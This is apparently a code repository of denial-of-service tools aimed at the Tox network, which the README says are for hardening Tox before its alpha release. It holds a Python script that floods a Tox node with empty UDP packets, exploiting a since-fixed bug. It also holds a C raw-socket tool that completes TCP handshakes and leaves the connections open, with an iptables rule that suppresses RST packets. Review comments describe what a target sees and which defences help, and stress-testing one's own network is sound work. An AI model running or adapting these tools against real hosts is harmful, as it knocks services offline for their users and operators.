├── README.md ├── tox_dos.py └── stress └── tcp_kill.c /README.md: -------------------------------------------------------------------------------- 1 | This repo contains various pieces of code to attack the tox network. 2 | 3 | Before tox reaches alpha, it must be capable of defending itself against all of them. 4 | 5 | TODO: add more attacks. -------------------------------------------------------------------------------- /tox_dos.py: -------------------------------------------------------------------------------- 1 | #This exploits the vulnerability fixed by: 2 | # https://github.com/irungentoo/ProjectTox-Core/commit/89022326d3742defd9c7b1111ddcda53688d85be 3 | 4 | import socket, time 5 | 6 | NODE_IP = "127.0.0.1" 7 | NODE_PORT = 33445 8 | 9 | print "NODE target IP:", NODE_IP 10 | print "NODE target port:", NODE_PORT 11 | 12 | sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 13 | 14 | while 1: 15 | sock.sendto("", (NODE_IP, NODE_PORT)) 16 | time.sleep(0.001) 17 | -------------------------------------------------------------------------------- /stress/tcp_kill.c: -------------------------------------------------------------------------------- 1 | /* TCP_KILL 2 | * 3 | * Tool that uses raw sockets to flood the target with TCP connections. 
*/

/* NOTE(review): the header name after each #include is missing in this listing. */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

/* Millisecond sleep helper built on usleep(); not referenced elsewhere in this listing. */
#define c_sleep(x) usleep(1000*x)

/*
 * 16-bit one's-complement checksum over nbytes bytes starting at ptr.
 *
 * Sums the buffer as 16-bit words, adds a trailing odd byte if there is one,
 * folds the carries back into the low 16 bits and returns the complement.
 * main() calls it on a pseudo-header followed by the TCP header.
 */
unsigned short csum(unsigned short *ptr,int nbytes)
{
    long sum;
    unsigned short oddbyte;
    short answer;

    sum=0;
    while(nbytes>1) {
        sum+=*ptr++;
        nbytes-=2;
    }
    if(nbytes==1) {
        /* Odd length: place the last byte in the first byte of a zeroed 16-bit word. */
        oddbyte=0;
        *((u_char*)&oddbyte)=*(u_char*)ptr;
        sum+=oddbyte;
    }

    /* Fold the carries above bit 15 back into the low 16 bits (done twice). */
    sum = (sum>>16)+(sum & 0xffff);
    sum = sum + (sum>>16);
    answer=(short)~sum;

    return(answer);
}


/* One IPv4 address, viewable as bytes, 16-bit halves, a 32-bit word or a struct in_addr. */
typedef union __attribute__ ((__packed__))
{
    uint8_t uint8[4];
    uint16_t uint16[2];
    uint32_t uint32;
    struct in_addr in_addr;
}
IP4;

/*
 * Pseudo-header that is prepended to the TCP header for the checksum only;
 * it is never passed to sendto(). main() fills prot with 6 and length with
 * htons(20).
 */
struct __attribute__ ((__packed__)) TCP_PSEUDO_HEADER
{
    uint32_t src;
    uint32_t dst;
    uint8_t zero;
    uint8_t prot;
    uint16_t length;
};

/*
 * TCP segment as built by main(). The members up to urgent_pointer add up to
 * 20 bytes. `data` and `length` follow them in the struct, but main() passes
 * only the first `length` (20) bytes to sendto(), so neither is transmitted;
 * `length` is used as the byte count.
 */
struct __attribute__ ((__packed__)) TCP_HEADER
{
    uint16_t src_port;
    uint16_t dst_port;
    uint32_t seq_number;
    uint32_t ack_number;
    uint8_t stuff[4];       /* header bytes 12..15: data offset, flags, window */
    uint16_t checksum;
    uint16_t urgent_pointer;
    uint8_t data[32];
    uint16_t length;
};


/*
 * Entry point. Requires exactly four arguments, read below as:
 *   argv[1]  destination IPv4 address (inet_pton)
 *   argv[2]  destination port (strtoul)
 *   argv[3]  source IPv4 address; in the visible code it is used only in the
 *            checksum pseudo-header and in the printed summary
 *   argv[4]  delay between iterations, passed to usleep() (microseconds)
 *
 * What a target sees, for detection and hardening: each outer iteration sends
 * one SYN with a rand() source port, a 20-byte header with no TCP options and
 * window bytes 0x72 0x10. Every SYN+ACK that comes back is answered with a
 * bare ACK, and nothing further is sent on that connection. The visible code
 * never sends data, FIN or RST, so each completed handshake stays open on the
 * target until the target's own timeouts or limits reclaim it. Per-source
 * connection caps, accept-rate limits and idle timeouts on the listener are
 * the relevant controls.
 *
 * NOTE(review): no IP_HDRINCL option is set on the raw socket in this listing,
 * so the IP header (and its source address) presumably comes from the local
 * kernel -- confirm against the complete file.
 *
 * Returns 0 after printing usage, 1 if the socket cannot be set up; otherwise
 * it loops until the process is interrupted.
 */
int main(int argc, char *argv[]) {
    if (argc != 5) {
        /* Also reached by goto when either address fails to parse. */
print_usage:
        printf("Tool that uses raw sockets to flood the target with TCP connections\n\
Usage: %s \n\
EX: %s 192.254.75.98 8000 192.168.2.10 0\n\n\
NOTE: this uses raw sockets so it must be run as root, you also need to disable kernel RST sending with:\n\
iptables -A OUTPUT -p tcp --dport 8000 --tcp-flags RST RST -j DROP\n\
where 8000 is the dst port.\n\n\
Use:\n\
iptables -F\n\
to clear the above iptables rule\n", argv[0], argv[0]);
        return 0;
    }


    IP4 dst_ip, src_ip;
    uint16_t port = strtoul(argv[2], 0, 0);
    unsigned long interval = strtoul(argv[4], 0, 0);
    if (inet_pton(AF_INET, argv[1], &dst_ip.in_addr) != 1)
        goto print_usage;

    if (inet_pton(AF_INET, argv[3], &src_ip.in_addr) != 1)
        goto print_usage;

    /* Echo the parsed parameters and wait for Enter before sending anything. */
    char addresstext[32];
    inet_ntop(AF_INET, &dst_ip.in_addr, addresstext, sizeof(addresstext));
    printf("Dest ip: %s:%u\n", addresstext, port);
    inet_ntop(AF_INET, &src_ip.in_addr, addresstext, sizeof(addresstext));
    printf("Src ip: %s\nInterval between packets: %lu (us)\n", addresstext, interval);
    printf("Press Enter to Continue or CTRL-C to cancel\n");
    while( getchar() != '\n' );

    srand(time(0));

    /* Raw TCP socket, made non-blocking so the receive loop below can drain and return. */
    int sock = socket (AF_INET, SOCK_RAW, IPPROTO_TCP);
    if (sock < 0 || fcntl(sock, F_SETFL, O_NONBLOCK, 1) != 0) {
        printf("create sock failed %i\n", sock);
        return 1;
    }

    /* count: final ACKs fully sent; cc: iterations since the last report; data_sent: bytes. */
    unsigned long count = 0, cc = 0, data_sent = 0;
    while (1) {
        struct sockaddr_storage addr = {0};
        size_t addrsize;
        struct sockaddr_in *addr4 = (struct sockaddr_in *)&addr;

        addrsize = sizeof(struct sockaddr_in);
        addr4->sin_family = AF_INET;
        addr4->sin_addr = dst_ip.in_addr;
        addr4->sin_port = htons(port);
        struct TCP_PSEUDO_HEADER tcp_ps_header_req;
        struct TCP_HEADER tcp_header_req;
        tcp_ps_header_req.dst = dst_ip.uint32;
        tcp_ps_header_req.src = src_ip.uint32;
        tcp_ps_header_req.zero = 0;
        tcp_ps_header_req.prot = 6;

        tcp_header_req.length = 20;
        tcp_ps_header_req.length = htons(tcp_header_req.length);

        /* Source port and initial sequence number come from rand(). */
        tcp_header_req.src_port = rand();
        tcp_header_req.dst_port = htons(port);
        tcp_header_req.seq_number = rand();
        tcp_header_req.ack_number = 0;
        tcp_header_req.stuff[0] = tcp_header_req.length * 2 * 2; /* 20*4 = 0x50: data offset of 5 words */
        tcp_header_req.stuff[1] = 2;                             /* flags byte: SYN */
        tcp_header_req.stuff[2] = 0x72;                          /* window, first byte */
        tcp_header_req.stuff[3] = 0x10;                          /* window, second byte */
        tcp_header_req.checksum = 0;
        tcp_header_req.urgent_pointer = 0;

        /* Scratch buffer: pseudo-header followed by the header, used as checksum input. */
        struct __attribute__ ((__packed__)) {
            struct TCP_PSEUDO_HEADER tcp_ps_header_req;
            struct TCP_HEADER tcp_header_req;
        }
        TCP_PACKET;
        TCP_PACKET.tcp_ps_header_req = tcp_ps_header_req;
        TCP_PACKET.tcp_header_req = tcp_header_req;
        tcp_header_req.checksum = csum((void *)&TCP_PACKET, sizeof(tcp_ps_header_req) + tcp_header_req.length);

        /* Only the first `length` bytes of the struct go on the wire. */
        int ret = sendto(sock, &tcp_header_req, tcp_header_req.length , 0, (struct sockaddr *)&addr, addrsize);
        if (ret > 0)
            data_sent += ret;

        /* Drain whatever the raw socket has queued; stops at the first recvfrom() < 0. */
        while (1) {
            struct sockaddr_storage r_addr;
            socklen_t addrlen = sizeof(r_addr);
            uint8_t data[128] = {0};
            int fail_or_len = recvfrom(sock, (char *) data, sizeof(data), 0, (struct sockaddr *)&r_addr, &addrlen);
            if (fail_or_len < 0)
                break;

            /* Received buffers begin with the IP header; 0x45 is IPv4 with a 20-byte header. */
            if (fail_or_len < 38 || data[0] != 0x45)
                continue;

            /* Bytes 12..15 of the IP header: sender's address, which must be the target. */
            uint32_t ip_cmp;
            memcpy(&ip_cmp, data + 12, 4);
            if (ip_cmp != dst_ip.uint32)
                continue;

            /* First two bytes after the IP header: TCP source port of the reply. */
            uint32_t port_cmp;
            memcpy(&port_cmp, data + 20, 2);
            if (port_cmp != htons(port))
                continue;

            /* Offset 20 + 13 is the TCP flags byte; 0x12 is SYN+ACK. */
            if (data[33] != 0x12) {
                //printf("%u\n", data[33]);
                continue;
            }

            /* Reuse the reply's fields for the answer: its destination port becomes
             * our source port, its sequence number (+1) our acknowledgement number,
             * and its acknowledgement number our sequence number. */
            memcpy(&tcp_header_req.src_port, data + 22, 2);
            memcpy(&tcp_header_req.ack_number, data + 24, 4);
            memcpy(&tcp_header_req.seq_number, data + 28, 4);
            tcp_header_req.ack_number = htonl(ntohl(tcp_header_req.ack_number) + 1);

            tcp_header_req.stuff[1] = 0x10; /* flags byte: ACK */
            tcp_header_req.checksum = 0;
            TCP_PACKET.tcp_ps_header_req = tcp_ps_header_req;
            TCP_PACKET.tcp_header_req = tcp_header_req;
            tcp_header_req.checksum = csum((void *)&TCP_PACKET, sizeof(tcp_ps_header_req) + tcp_header_req.length);
            ret = sendto(sock, &tcp_header_req, tcp_header_req.length , 0, (struct sockaddr *)&addr, addrsize);
            if (ret == tcp_header_req.length) {
                data_sent += ret;
                ++count;
            }
        }

        /* Progress report: every iteration when interval exceeds one second,
         * otherwise roughly once per second's worth of iterations. */
        if (interval > 1000000 || cc > (1000000 / (interval + 1))) {
            printf("connections created: %lu total data sent: %lu bytes\n", count, data_sent);
            cc = 0;
        }

        if (interval)
            usleep(interval);

        ++cc;
    }
}
--------------------------------------------------------------------------------